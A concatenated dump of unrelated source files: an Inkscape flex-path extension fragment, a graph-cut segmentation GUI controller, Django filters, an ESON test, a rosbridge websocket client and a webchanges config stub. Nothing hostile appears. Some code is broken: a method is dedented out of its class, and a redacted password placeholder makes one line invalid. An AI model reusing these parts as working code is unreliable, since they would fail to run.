            pa = pl.split()
            d = "".join(["M " + pa[i] if i == 0 else " L " + pa[i] for i in range(0, len(pa))])
            self.DebugMsg('PolyLine :'+ d +'\n')
            self.getPathVertices(d, node)
        elif node.tag == inkex.addNS('polygon', 'svg') or node.tag == 'polygon':
            # Convert
            #
            # <polygon points="x1,y1 x2,y2 x3,y3 [...]"/>
            #
            # to
            #
            # <path d="Mx1,y1 Lx2,y2 Lx3,y3 [...] Z"/>
            #
            # Note: we ignore polygons with no points
            pl = node.get('points', '').strip()
            # NOTE(review): no-op guard, same remark as for <polyline> above.
            if pl == '':
                pass
            pa = pl.split()
            d = "".join(["M " + pa[i] if i == 0 else " L " + pa[i] for i in range(0, len(pa))])
            d += " Z"
            self.DebugMsg('Polygon :'+ d +'\n')
            self.getPathVertices(d, node)
        elif node.tag == inkex.addNS('ellipse', 'svg') or \
             node.tag == 'ellipse' or \
             node.tag == inkex.addNS('circle', 'svg') or \
             node.tag == 'circle':
            # Convert circles and ellipses to a path with two 180 degree arcs.
            # In general (an ellipse), we convert
            #
            # <ellipse rx="RX" ry="RY" cx="X" cy="Y"/>
            #
            # to
            #
            # <path d="MX1,CY A RX,RY 0 1 0 X2,CY A RX,RY 0 1 0 X1,CY"/>
            #
            # where
            #
            # X1 = CX - RX
            # X2 = CX + RX
            #
            # Note: ellipses or circles with a radius attribute of value 0 are ignored
            if node.tag == inkex.addNS('ellipse', 'svg') or node.tag == 'ellipse':
                rx = float(node.get('rx', '0'))
                ry = float(node.get('ry', '0'))
            else:
                rx = float(node.get('r', '0'))
                ry = rx
            # NOTE(review): no-op guard — zero-radius shapes are NOT actually
            # skipped despite the comment above; confirm before changing to 'continue'.
            if rx == 0 or ry == 0:
                pass
            cx = float(node.get('cx', '0'))
            cy = float(node.get('cy', '0'))
            x1 = cx - rx
            x2 = cx + rx
            d = 'M %f,%f ' % (x1, cy) + \
                'A %f,%f ' % (rx, ry) + \
                '0 1 0 %f,%f ' % (x2, cy) + \
                'A %f,%f ' % (rx, ry) + \
                '0 1 0 %f,%f' % (x1, cy)
            self.DebugMsg('Arc :'+ d +'\n')
            self.getPathVertices(d, node)
        elif node.tag == inkex.addNS('pattern', 'svg') or node.tag == 'pattern':
            pass
        elif node.tag == inkex.addNS('metadata', 'svg') or node.tag == 'metadata':
            pass
        elif node.tag == inkex.addNS('defs', 'svg') or node.tag == 'defs':
            pass
        elif node.tag == inkex.addNS('desc', 'svg') or node.tag == 'desc':
            pass
        elif node.tag == inkex.addNS('namedview', 'sodipodi') or node.tag == 'namedview':
            pass
        elif node.tag == inkex.addNS('eggbot', 'svg') or node.tag == 'eggbot':
            pass
        elif node.tag == inkex.addNS('text', 'svg') or node.tag == 'text':
            inkex.errormsg('Warning: unable to draw text, please convert it to a path first.')
            pass
        elif node.tag == inkex.addNS('title', 'svg') or node.tag == 'title':
            pass
        elif node.tag == inkex.addNS('image', 'svg') or node.tag == 'image':
            # BUG FIX: dict.has_key() was removed in Python 3; use 'in' instead.
            if 'image' not in self.warnings:
                inkex.errormsg(gettext.gettext('Warning: unable to draw bitmap images; ' +
                    'please convert them to line art first. Consider using the "Trace bitmap..." ' +
                    'tool of the "Path" menu. Mac users please note that some X11 settings may ' +
                    'cause cut-and-paste operations to paste in bitmap copies.'))
                self.warnings['image'] = 1
            pass
        # (Removed an unreachable duplicate 'pattern' branch that could never
        # fire because the identical test appears earlier in this chain.)
        elif node.tag == inkex.addNS('radialGradient', 'svg') or node.tag == 'radialGradient':
            # Similar to pattern
            pass
        elif node.tag == inkex.addNS('linearGradient', 'svg') or node.tag == 'linearGradient':
            # Similar in pattern
            pass
        elif node.tag == inkex.addNS('style', 'svg') or node.tag == 'style':
            # This is a reference to an external style sheet and not the value
            # of a style attribute to be inherited by child elements
            pass
        elif node.tag == inkex.addNS('cursor', 'svg') or node.tag == 'cursor':
            pass
        elif node.tag == inkex.addNS('color-profile', 'svg') or node.tag == 'color-profile':
            # Gamma curves, color temp, etc. are not relevant to single color output
            pass
        # BUG FIX: 'basestring' does not exist in Python 3; 'str' is correct
        # because lxml node tags are str (function refs for comments/PIs).
        elif not isinstance(node.tag, str):
            # This is likely an XML processing instruction such as an XML
            # comment. lxml uses a function reference for such node tags
            # and as such the node tag is likely not a printable string.
            # Further, converting it to a printable string likely won't
            # be very useful.
            pass
        else:
            inkex.errormsg('Warning: unable to draw object <%s>, please convert it to a path first.' % node.tag)
            pass
def effect(self):
    """
    Main entry point of the extension: read the user options, walk the
    selected SVG objects to collect their polygons, then generate for each
    collected path the notched outline and its matching flex band in a new
    'Flex_Path' layer.
    """
    # convert units
    unit = self.options.unit
    self.thickness = self.svg.unittouu(str(self.options.thickness) + unit)
    self.height = self.svg.unittouu(str(self.options.zc) + unit)
    self.max_flex_size = self.svg.unittouu(str(self.options.max_size_flex) + unit)
    self.notchesInterval = int(self.options.notch_interval)
    svg = self.document.getroot()
    docWidth = self.svg.unittouu(svg.get('width'))      # NOTE(review): unused; kept for behavior parity — confirm before removing
    docHeigh = self.svg.unittouu(svg.attrib['height'])  # NOTE(review): unused (and misspelled); kept for behavior parity
    # Open Debug file if requested
    if self.options.Mode_Debug:
        try:
            self.fDebug = open('DebugPath2Flex.txt', 'w')
        except IOError:
            print('cannot open debug output file')
    self.DebugMsg("Start processing\n")
    # First traverse the document (or selected items), reducing
    # everything to line segments. If working on a selection,
    # then determine the selection's bounding box in the process.
    # (Actually, we just need to know it's extrema on the x-axis.)
    # Traverse the selected objects
    # (Loop variable renamed from 'id' to avoid shadowing the builtin.)
    for node_id in self.options.ids:
        self.recursivelyTraverseSvg([self.svg.selected[node_id]])
    # Determine the center of the drawing's bounding box
    self.cx = self.xmin + (self.xmax - self.xmin) / 2.0
    self.cy = self.ymin + (self.ymax - self.ymin) / 2.0
    layer = etree.SubElement(svg, 'g')
    layer.set(inkex.addNS('label', 'inkscape'), 'Flex_Path')
    layer.set(inkex.addNS('groupmode', 'inkscape'), 'layer')
    # For each path, build a polygon with notches and the corresponding flex.
    for key in self.paths:
        self.writeModifiedPath(key, layer)
    # BUG FIX: guard with getattr — self.fDebug is never assigned when debug
    # mode is off or when the open() above failed with IOError, and the bare
    # attribute access raised AttributeError in those cases.
    if getattr(self, 'fDebug', None):
        self.fDebug.close()
# Standard Inkscape-extension entry point: run the effect only when this
# file is executed as a script.
# (Removed a dataset-extraction artifact that was fused onto this line.)
if __name__ == '__main__':
    Path2Flex().run()
HW4/submission/PART II/code/graph_cut_controller.py | ardaduz/math-cgv | 0 | 12767353 | import numpy as np
import scipy.ndimage as ndimage
import matplotlib.pyplot as plt
from skimage import data, color, img_as_float
from tkinter import *
from PIL import Image
from graph_cut import GraphCut
from graph_cut_gui import GraphCutGui
class GraphCutController:
    """Controller wiring the Tk GUI to the interactive graph-cut segmentation pipeline."""

    def __init__(self):
        self.__init_view()

    def __init_view(self):
        # Build the Tk root window and hand it to the GUI; mainloop() blocks
        # until the window is closed.
        root = Tk()
        root.geometry("700x500")
        self._view = GraphCutGui(self, root)
        root.mainloop()

    # TASK 2.1
    def __get_color_histogram(self, image, seed, hist_res):
        """
        Compute a color histogram based on selected points from an image
        :param image: color image (H x W x 3, values in [0, 255])
        :param seed: Nx2 matrix containing the position (col, row) of pixels used to compute the color histogram
        :param hist_res: resolution of the histogram (bins per channel)
        :return: normalized, smoothed color histogram of shape (hist_res, hist_res, hist_res)
        """
        # seed columns are (x, y) = (col, row), hence the [:, 1], [:, 0] indexing.
        seed_r_values = image[seed[:, 1], seed[:, 0], 0]
        seed_g_values = image[seed[:, 1], seed[:, 0], 1]
        seed_b_values = image[seed[:, 1], seed[:, 0], 2]
        # (Local renamed from 'data' to avoid shadowing the module-level skimage import.)
        samples = np.transpose(np.vstack((seed_r_values, seed_g_values, seed_b_values)))
        histogram, _ = np.histogramdd(samples, hist_res, range=[(0, 255), (0, 255), (0, 255)])
        # Smooth with a small Gaussian (sigma = 0.85) so colors close to, but not
        # exactly among, the seeds still get non-zero probability.
        # (The original comment claimed sigma = 0.65, which contradicted the code.)
        smoothed_histogram = ndimage.gaussian_filter(histogram, 0.85)
        normalized_smoothed_histogram = smoothed_histogram / np.sum(smoothed_histogram.ravel())
        return normalized_smoothed_histogram

    # TASK 2.2
    # K is set very high using numpy's inf for the hard seed constraints.
    def __get_unaries(self, image, lambda_param, hist_fg, hist_bg, seed_fg, seed_bg):
        """
        Compute the unary (data) cost of every pixel.
        :param image: color image as a numpy array
        :param lambda_param: lambda as set by the user
        :param hist_fg: foreground color histogram
        :param hist_bg: background color histogram
        :param seed_fg: pixels marked as foreground by the user (col, row)
        :param seed_bg: pixels marked as background by the user (col, row)
        :return: unaries : Nx2 numpy array containing the unary cost for every pixel in I
                 (N = number of pixels; column 0 = foreground cost, column 1 = background cost)
        """
        print("Calcuating unaries...")
        # Derive the bin count from the histogram itself instead of hard-coding 32,
        # so any hist_res chosen upstream keeps working.
        num_bins = np.size(hist_fg, 0)
        hist_step = 255.0 / num_bins
        image_rows = np.size(image, 0)
        image_cols = np.size(image, 1)
        unaries = np.empty((image_rows, image_cols, 2))
        for i in range(0, image_rows):
            for j in range(0, image_cols):
                pixel = image[i, j, :]
                pixel_bins = np.floor(pixel / hist_step).astype(int)
                # A channel value of exactly 255 lands on the upper edge; clamp into the last bin.
                pixel_bins[pixel_bins == num_bins] = num_bins - 1
                # Negative log-likelihood; the epsilon avoids log(0).
                cost_fg = -np.log(hist_fg[pixel_bins[0], pixel_bins[1], pixel_bins[2]] + 1e-10)
                cost_bg = -np.log(hist_bg[pixel_bins[0], pixel_bins[1], pixel_bins[2]] + 1e-10)
                unaries[i, j, 1] = lambda_param * cost_bg
                unaries[i, j, 0] = lambda_param * cost_fg
        # Hard constraints: user seeds are forced to their label with infinite cost.
        for j, i in seed_fg:
            unaries[i, j, 1] = np.inf
            unaries[i, j, 0] = 0
        for j, i in seed_bg:
            unaries[i, j, 1] = 0
            unaries[i, j, 0] = np.inf
        unariesN = np.reshape(unaries, (-1, 2))
        return unariesN

    # TASK 2.3
    def __get_pairwise(self, image, sigma):
        """
        Get pairwise terms for each pair of neighboring pixels on image
        :param image: color image as a numpy array
        :param sigma: ad-hoc cost function parameter
        :return: pairwise : ivj (triplet or coo) formatted list of lists containing the pairwise costs for image
        """
        def get_neighbours(i, j, image_rows, image_cols):
            # 8-connected neighbourhood of (i, j), clipped to the image bounds.
            neighbours = np.array([[i - 1, j - 1],  # upper left
                                   [i - 1, j],      # upper
                                   [i - 1, j + 1],  # upper right
                                   [i, j + 1],      # right
                                   [i + 1, j + 1],  # lower right
                                   [i + 1, j],      # lower
                                   [i + 1, j - 1],  # lower left
                                   [i, j - 1]])     # left
            is_boundary_1 = 0 <= neighbours[:, 0]
            is_boundary_2 = image_rows > neighbours[:, 0]
            is_boundary_3 = 0 <= neighbours[:, 1]
            is_boundary_4 = image_cols > neighbours[:, 1]
            valid = np.logical_and(np.logical_and(is_boundary_1, is_boundary_2), np.logical_and(is_boundary_3, is_boundary_4))
            return neighbours[valid, :]

        print("Calcuating pairwises...")
        image_rows = np.size(image, 0)
        image_cols = np.size(image, 1)
        pairwise = []
        for i in range(0, image_rows):
            for j in range(0, image_cols):
                current_coordinates = np.array([i, j])
                current_index = i * image_cols + j
                current_pixel = image[i, j].astype(float)
                neighbour_coordinates = get_neighbours(i, j, image_rows, image_cols)
                neighbour_indices = neighbour_coordinates[:, 0] * image_cols + neighbour_coordinates[:, 1]
                neighbour_pixels = image[neighbour_coordinates[:, 0], neighbour_coordinates[:, 1]].astype(float)
                pixel_differences = np.subtract(neighbour_pixels, current_pixel)
                pixel_distances = np.linalg.norm(pixel_differences, axis=1)
                spatial_differences = current_coordinates - neighbour_coordinates
                spatial_differences = np.linalg.norm(spatial_differences, axis=1)
                # Ad-hoc boundary cost: large for similar colors, small across strong
                # edges, attenuated by spatial distance (diagonal neighbours).
                neighbour_costs = np.divide(np.exp(-np.square(pixel_distances) / (2 * np.square(sigma))),
                                            spatial_differences)
                for k in range(0, np.size(neighbour_indices.ravel())):
                    neighbour_index = neighbour_indices[k]
                    cost = neighbour_costs[k]
                    pairwise.append([current_index, neighbour_index, 0, cost, 0, 0])
                if current_index % 1000 == 0:
                    print(current_index, '/', image_rows * image_cols)
        pairwise = np.asarray(pairwise)
        return pairwise

    # TASK 2.4 get segmented image to the view
    def __get_segmented_image(self, image, labels, background=None):
        """
        Return a segmented image, as well as an image with new background
        :param image: color image as a numpy array
        :param labels: labels as a numpy array (True = background, False = foreground)
        :param background: color image as a numpy array
        :return image_segmented: image as a numpy array with red foreground, blue background
        :return image_with_background: image as a numpy array with changed background if any (None if not)
        """
        image_rows = np.size(image, 0)
        image_cols = np.size(image, 1)
        not_labels = np.logical_not(labels)
        mask = np.zeros((image_rows, image_cols, 3), dtype=np.uint8)
        mask[not_labels, :] = np.array([255, 0, 0], dtype=np.uint8)
        mask[labels, :] = np.array([0, 0, 255])
        image_PIL = Image.fromarray(image)
        mask_PIL = Image.fromarray(mask)
        result_PIL = Image.blend(image_PIL, mask_PIL, 0.6)
        segmented_image = np.array(result_PIL)
        if background is not None:
            # BUG FIX: removed two dead lines that built an unused boolean mask
            # with np.bool(1) — np.bool was removed in NumPy 1.24, so they
            # crashed on modern NumPy without contributing to the result.
            result = np.copy(background[0:image_rows, 0:image_cols, :])
            result.setflags(write=1)
            # Paste the foreground pixels of the original image over the new background.
            result[not_labels, 0:3] = image[not_labels, 0:3]
            segmented_image_with_background = result
        else:
            segmented_image_with_background = None
        return segmented_image, segmented_image_with_background

    def segment_image(self, image, seed_fg, seed_bg, lambda_value, background=None):
        """
        Run the full segmentation pipeline and push the result to the view.
        :param image: PIL image to segment
        :param seed_fg: list of (col, row) foreground seed pixels
        :param seed_bg: list of (col, row) background seed pixels
        :param lambda_value: weight of the unary terms
        :param background: optional PIL image used as a replacement background
        """
        image_array = np.asarray(image)
        background_array = None
        if background:
            background = background.convert("RGB")
            background_array = np.asarray(background)
        seed_fg = np.array(seed_fg)
        seed_bg = np.array(seed_bg)
        height, width = np.shape(image_array)[0:2]
        num_pixels = height * width
        # TASK 2.1 - get the color histogram for the unaries
        hist_res = 32
        cost_fg = self.__get_color_histogram(image_array, seed_fg, hist_res)
        cost_bg = self.__get_color_histogram(image_array, seed_bg, hist_res)
        # TASK 2.2-2.3 - set the unaries and the pairwise terms
        unaries = self.__get_unaries(image_array, lambda_value, cost_fg, cost_bg, seed_fg, seed_bg)
        pairwise = self.__get_pairwise(image_array, sigma=5)
        # TASK 2.4 - perform graph cut
        # (len(pairwise) replaces the non-idiomatic pairwise.__len__() call.)
        g = GraphCut(num_pixels, len(pairwise))
        g.set_unary(unaries)
        g.set_pairwise(pairwise)
        g.minimize()
        labels = g.get_labeling()
        labels = np.reshape(labels, (height, width))
        # plt.imshow(labels)
        # plt.show()
        # TASK 2.4 get segmented image to the view
        segmented_image, segmented_image_with_background = self.__get_segmented_image(image_array, labels, background_array)
        # transform image array to an rgb image
        segmented_image = Image.fromarray(segmented_image, 'RGB')
        self._view.set_canvas_image(segmented_image)
        if segmented_image_with_background is not None:
            segmented_image_with_background = Image.fromarray(segmented_image_with_background, 'RGB')
            plt.imshow(segmented_image_with_background)
            plt.show()
| 2.96875 | 3 |
notaso/restapiv2/filters.py | jpadilla/notaso | 11 | 12767354 | <gh_stars>10-100
import django_filters
from ..professors.models import Professor
from ..universities.models import University
class UniversityFilter(django_filters.FilterSet):
    """Filter University querysets by name and city."""
    class Meta:
        # Exposes ``name`` and ``city`` as exact-match query parameters.
        model = University
        fields = ["name", "city"]
class ProfessorFilter(django_filters.FilterSet):
    """
    Filter professors by university name,
    university city, department, gender and score.
    """
    # Relation-traversing filters, exposed under flat query-parameter names.
    university_name = django_filters.CharFilter(field_name="university__name")
    university_city = django_filters.CharFilter(field_name="university__city")
    department = django_filters.CharFilter(field_name="department__name")
    class Meta:
        model = Professor
        fields = ["university_name", "university_city", "department", "gender", "score"]
| 2.40625 | 2 |
python/test.py | syoyo/eson | 20 | 12767355 | <gh_stars>10-100
import eson
import struct
def packFloatList( floatList ):
    """Serialize a list of floats as little-endian 32-bit IEEE-754 bytes."""
    fmt = '<%df' % len(floatList)
    return struct.pack(fmt, *floatList)
# Build a sample document exercising the three ESON value types:
# an integer, a float, and a packed binary blob.
d = {}
farr = [1.0, 2.0, 2.1, 3.0, 3.5]
# NOTE(review): ``long`` exists only under Python 2; use int() on Python 3.
d['aa'] = long(3) # int() is still OK
d['bb'] = float(3)
d['cc'] = packFloatList(farr)
# Serialize the document and write the encoded bytes to disk.
ed = eson.dumps(d)
f = open("test.eson", "wb")
f.write(ed)
f.close()
| 2.515625 | 3 |
flo_web/src/wsFactory.py | Rehab-Robotics-Lab/LilFloSystem | 10 | 12767356 | <gh_stars>1-10
#!/usr/bin/env python
# pylint: skip-file
# This file comes copied from a library. There are only a few
# modified lines. Will leave style errors in place.
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of <NAME>, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
from rosbridge_library.capabilities.call_service import CallService
from rosbridge_library.capabilities.unadvertise_service import UnadvertiseService
from rosbridge_library.capabilities.advertise_service import AdvertiseService
from rosbridge_library.capabilities.subscribe import Subscribe
from rosbridge_library.capabilities.publish import Publish
from rosbridge_library.capabilities.advertise import Advertise
from wsConnector import RosbridgeWebSocket
from rosbridge_server import ClientManager
import os
import rospy
import sys
from twisted.python import log
from twisted.internet import reactor, ssl
from twisted.internet.error import CannotListenError, ReactorNotRunning
from twisted.internet.protocol import ReconnectingClientFactory
from autobahn.twisted.websocket import WebSocketServerFactory, listenWS
from autobahn.twisted.websocket import WebSocketClientFactory
from autobahn.websocket.compress import (PerMessageDeflateOffer,
PerMessageDeflateOfferAccept)
from autobahn.twisted.websocket import connectWS
# Route twisted's log output to stdout so it shows up in the ROS console.
log.startLogging(sys.stdout)
def shutdown_hook():
    """Stop the twisted reactor on ROS shutdown; tolerate a stopped reactor."""
    try:
        reactor.stop()
    except ReactorNotRunning:
        # Can happen on double shutdown or if the reactor never started.
        rospy.logwarn("Can't stop the reactor, it wasn't running")
class ReconnectingWebSocketClientFactory(ReconnectingClientFactory, WebSocketClientFactory):
    """WebSocket client factory that automatically reconnects after a drop."""
    protocol = RosbridgeWebSocket
    # Cap the exponential reconnect backoff at one second so the robot
    # re-establishes its server link quickly.
    maxDelay = 1
if __name__ == "__main__":
    rospy.init_node("rosbridge_websocket")
    ##################################################
    # Parameter handling #
    ##################################################
    # Seconds to wait between attempts to reach the server at startup.
    retry_startup_delay = rospy.get_param(
        '~retry_startup_delay', 2.0)  # seconds
    use_compression = rospy.get_param('~use_compression', False)
    # get RosbridgeProtocol parameters (fragmentation, throttling, limits)
    RosbridgeWebSocket.fragment_timeout = rospy.get_param('~fragment_timeout',
                                                          RosbridgeWebSocket.fragment_timeout)
    RosbridgeWebSocket.delay_between_messages = rospy.get_param('~delay_between_messages',
                                                                RosbridgeWebSocket.delay_between_messages)
    RosbridgeWebSocket.max_message_size = rospy.get_param('~max_message_size',
                                                          RosbridgeWebSocket.max_message_size)
    RosbridgeWebSocket.unregister_timeout = rospy.get_param('~unregister_timeout',
                                                            RosbridgeWebSocket.unregister_timeout)
    bson_only_mode = rospy.get_param('~bson_only_mode', False)
    # The literal string "None" disables the message size limit entirely.
    if RosbridgeWebSocket.max_message_size == "None":
        RosbridgeWebSocket.max_message_size = None
    ping_interval = float(rospy.get_param('~websocket_ping_interval', 0))
    ping_timeout = float(rospy.get_param('~websocket_ping_timeout', 30))
    port = rospy.get_param('~port', 8080)
    address = rospy.get_param('~address', "0.0.0.0")
    external_port = int(rospy.get_param('~websocket_external_port', port))
    RosbridgeWebSocket.client_manager = ClientManager()
    # Get the glob strings and parse them as arrays.
    # Params arrive as "[a, b, c]"-style strings; strip brackets and quotes.
    RosbridgeWebSocket.topics_glob = [
        element.strip().strip("'")
        for element in rospy.get_param('~topics_glob', '')[1:-1].split(',')
        if len(element.strip().strip("'")) > 0]
    RosbridgeWebSocket.services_glob = [
        element.strip().strip("'")
        for element in rospy.get_param('~services_glob', '')[1:-1].split(',')
        if len(element.strip().strip("'")) > 0]
    RosbridgeWebSocket.params_glob = [
        element.strip().strip("'")
        for element in rospy.get_param('~params_glob', '')[1:-1].split(',')
        if len(element.strip().strip("'")) > 0]
if "--port" in sys.argv:
idx = sys.argv.index("--port")+1
if idx < len(sys.argv):
port = int(sys.argv[idx])
else:
print("--port argument provided without a value.")
sys.exit(-1)
if "--address" in sys.argv:
idx = sys.argv.index("--address")+1
if idx < len(sys.argv):
address = str(sys.argv[idx])
else:
print("--address argument provided without a value.")
sys.exit(-1)
if "--retry_startup_delay" in sys.argv:
idx = sys.argv.index("--retry_startup_delay") + 1
if idx < len(sys.argv):
retry_startup_delay = int(sys.argv[idx])
else:
print("--retry_startup_delay argument provided without a value.")
sys.exit(-1)
if "--fragment_timeout" in sys.argv:
idx = sys.argv.index("--fragment_timeout") + 1
if idx < len(sys.argv):
RosbridgeWebSocket.fragment_timeout = int(sys.argv[idx])
else:
print("--fragment_timeout argument provided without a value.")
sys.exit(-1)
if "--delay_between_messages" in sys.argv:
idx = sys.argv.index("--delay_between_messages") + 1
if idx < len(sys.argv):
RosbridgeWebSocket.delay_between_messages = float(sys.argv[idx])
else:
print("--delay_between_messages argument provided without a value.")
sys.exit(-1)
if "--max_message_size" in sys.argv:
idx = sys.argv.index("--max_message_size") + 1
if idx < len(sys.argv):
value = sys.argv[idx]
if value == "None":
RosbridgeWebSocket.max_message_size = None
else:
RosbridgeWebSocket.max_message_size = int(value)
else:
print(
"--max_message_size argument provided without a value. (can be None or <Integer>)")
sys.exit(-1)
if "--unregister_timeout" in sys.argv:
idx = sys.argv.index("--unregister_timeout") + 1
if idx < len(sys.argv):
unregister_timeout = float(sys.argv[idx])
else:
print("--unregister_timeout argument provided without a value.")
sys.exit(-1)
if "--topics_glob" in sys.argv:
idx = sys.argv.index("--topics_glob") + 1
if idx < len(sys.argv):
value = sys.argv[idx]
if value == "None":
RosbridgeWebSocket.topics_glob = []
else:
RosbridgeWebSocket.topics_glob = [element.strip().strip(
"'") for element in value[1:-1].split(',')]
else:
print(
"--topics_glob argument provided without a value. (can be None or a list)")
sys.exit(-1)
if "--services_glob" in sys.argv:
idx = sys.argv.index("--services_glob") + 1
if idx < len(sys.argv):
value = sys.argv[idx]
if value == "None":
RosbridgeWebSocket.services_glob = []
else:
RosbridgeWebSocket.services_glob = [element.strip().strip(
"'") for element in value[1:-1].split(',')]
else:
print(
"--services_glob argument provided without a value. (can be None or a list)")
sys.exit(-1)
if "--params_glob" in sys.argv:
idx = sys.argv.index("--params_glob") + 1
if idx < len(sys.argv):
value = sys.argv[idx]
if value == "None":
RosbridgeWebSocket.params_glob = []
else:
RosbridgeWebSocket.params_glob = [element.strip().strip(
"'") for element in value[1:-1].split(',')]
else:
print(
"--params_glob argument provided without a value. (can be None or a list)")
sys.exit(-1)
if ("--bson_only_mode" in sys.argv) or bson_only_mode:
RosbridgeWebSocket.bson_only_mode = bson_only_mode
if "--websocket_ping_interval" in sys.argv:
idx = sys.argv.index("--websocket_ping_interval") + 1
if idx < len(sys.argv):
ping_interval = float(sys.argv[idx])
else:
print("--websocket_ping_interval argument provided without a value.")
sys.exit(-1)
if "--websocket_ping_timeout" in sys.argv:
idx = sys.argv.index("--websocket_ping_timeout") + 1
if idx < len(sys.argv):
ping_timeout = float(sys.argv[idx])
else:
print("--websocket_ping_timeout argument provided without a value.")
sys.exit(-1)
if "--websocket_external_port" in sys.argv:
idx = sys.argv.index("--websocket_external_port") + 1
if idx < len(sys.argv):
external_port = int(sys.argv[idx])
else:
print("--websocket_external_port argument provided without a value.")
sys.exit(-1)
    # To be able to access the list of topics and services, you must be able to access the rosapi services.
    if RosbridgeWebSocket.services_glob:
        RosbridgeWebSocket.services_glob.append("/rosapi/*")
    # Propagate the glob whitelists to every capability class.
    Subscribe.topics_glob = RosbridgeWebSocket.topics_glob
    Advertise.topics_glob = RosbridgeWebSocket.topics_glob
    Publish.topics_glob = RosbridgeWebSocket.topics_glob
    AdvertiseService.services_glob = RosbridgeWebSocket.services_glob
    UnadvertiseService.services_glob = RosbridgeWebSocket.services_glob
    CallService.services_glob = RosbridgeWebSocket.services_glob
    # Support the legacy "" address value.
    # The socket library would interpret this as INADDR_ANY.
    if not address:
        address = '0.0.0.0'
    ##################################################
    # Done with parameter handling #
    ##################################################
    def handle_compression_offers(offers):
        """Accept a permessage-deflate offer only when compression is enabled."""
        if not use_compression:
            return
        for offer in offers:
            if isinstance(offer, PerMessageDeflateOffer):
                return PerMessageDeflateOfferAccept(offer)
# if certfile is not None and keyfile is not None:
# protocol = 'wss'
# context_factory = ssl.DefaultOpenSSLContextFactory(keyfile, certfile)
# else:
# protocol = 'ws'
# context_factory = None
# For testing purposes, use an ephemeral port if port == 0.
# Write the actual port as a param for tests to read.
# rospy.set_param('~actual_port', port)
# uri = '{}://{}:{}'.format(protocol, address, port)
# uri = 'wss://localhost/host/'
uri = 'wss://{}/host/'.format(address)
rospy.loginfo('setting factory to connect to %s', uri)
ROBOT_NAME = os.environ['ROBOT_NAME']
ROBOT_PASSWORD = os.environ['ROBOT_PASSWORD']
rospy.loginfo('connecting to server with name: %s', ROBOT_NAME)
HEADERS = {
'robotName': ROBOT_NAME,
'robotPassword': <PASSWORD>
}
factory = ReconnectingWebSocketClientFactory(uri, headers=HEADERS)
factory.protocol = RosbridgeWebSocket
factory.setProtocolOptions(
perMessageCompressionAccept=handle_compression_offers,
autoPingInterval=ping_interval,
autoPingTimeout=ping_timeout,
)
connected = False
while not connected and not rospy.is_shutdown():
try:
# reactor.connectTCP("192.168.1.7", 443, factory)
connectWS(factory, ssl.ClientContextFactory())
# TODO: Need to get this ip address to be web address.
# listenWS(factory, context_factory)
rospy.loginfo(
'Rosbridge WebSocket client connect to {}'.format(uri))
connected = True
except CannotListenError as e:
rospy.logwarn("Unable to start server: " + str(e) +
" Retrying in " + str(retry_startup_delay) + "s.")
rospy.sleep(retry_startup_delay)
rospy.on_shutdown(shutdown_hook)
reactor.run()
| 1.257813 | 1 |
webchanges/config.py | scottmac/webchanges | 0 | 12767357 | <filename>webchanges/config.py
"""Command-line configuration."""
import argparse
import os
from os import PathLike
from pathlib import Path
from typing import List, Optional, Union
from . import __doc__, __project_name__, __version__
class BaseConfig(object):
    """Shared configuration holder.

    Stores the project name, configuration/jobs/hooks file locations, the
    snapshot cache location and the verbosity flag used by all layers.
    """

    def __init__(
        self,
        project_name: str,
        config_dir: Path,
        config: Path,
        jobs: Path,
        hooks: Path,
        cache: Union[str, PathLike],
        verbose: bool,
    ) -> None:
        # Identity and base directory for configuration files.
        self.project_name = project_name
        self.config_dir = config_dir
        # Individual file locations.
        self.config = config
        self.jobs = jobs
        self.hooks = hooks
        # Snapshot store: a path-like or a redis URI string.
        self.cache = cache
        # Whether logging output was requested.
        self.verbose = verbose
class CommandConfig(BaseConfig):
    """Command line arguments configuration.

    Extends :class:`BaseConfig` with one attribute per supported switch,
    initialized to its default and then overwritten by ``parse_args()``.
    """
    def __init__(
        self,
        project_name: str,
        config_dir: Path,
        config: Path,
        jobs: Path,
        hooks: Path,
        cache: Union[str, PathLike],
        verbose: bool,
    ) -> None:
        super().__init__(project_name, config_dir, config, jobs, hooks, cache, verbose)
        # Defaults for every command-line switch (mirrors parse_args() below).
        self.joblist: Optional[List[int]] = None
        self.list: bool = False
        self.errors: bool = False
        self.test_job: Optional[str] = None
        self.test_diff: Optional[str] = None
        self.add: Optional[str] = None
        self.delete: Optional[str] = None
        self.test_reporter: Optional[str] = None
        self.smtp_login: bool = False
        self.telegram_chats: bool = False
        self.xmpp_login: bool = False
        self.edit: bool = False
        self.edit_config: bool = False
        self.edit_hooks: bool = False
        self.gc_cache: bool = False
        self.clean_cache: bool = False
        self.rollback_cache: Optional[int] = None
        self.delete_snapshot: Optional[str] = None
        self.database_engine: str = 'sqlite3'
        self.max_snapshots: int = 4
        self.features: bool = False
        self.log_level: str = 'DEBUG'
        # Parse sys.argv immediately so the attributes above reflect the
        # actual command line.
        self.parse_args()
    def parse_args(self) -> argparse.ArgumentParser:
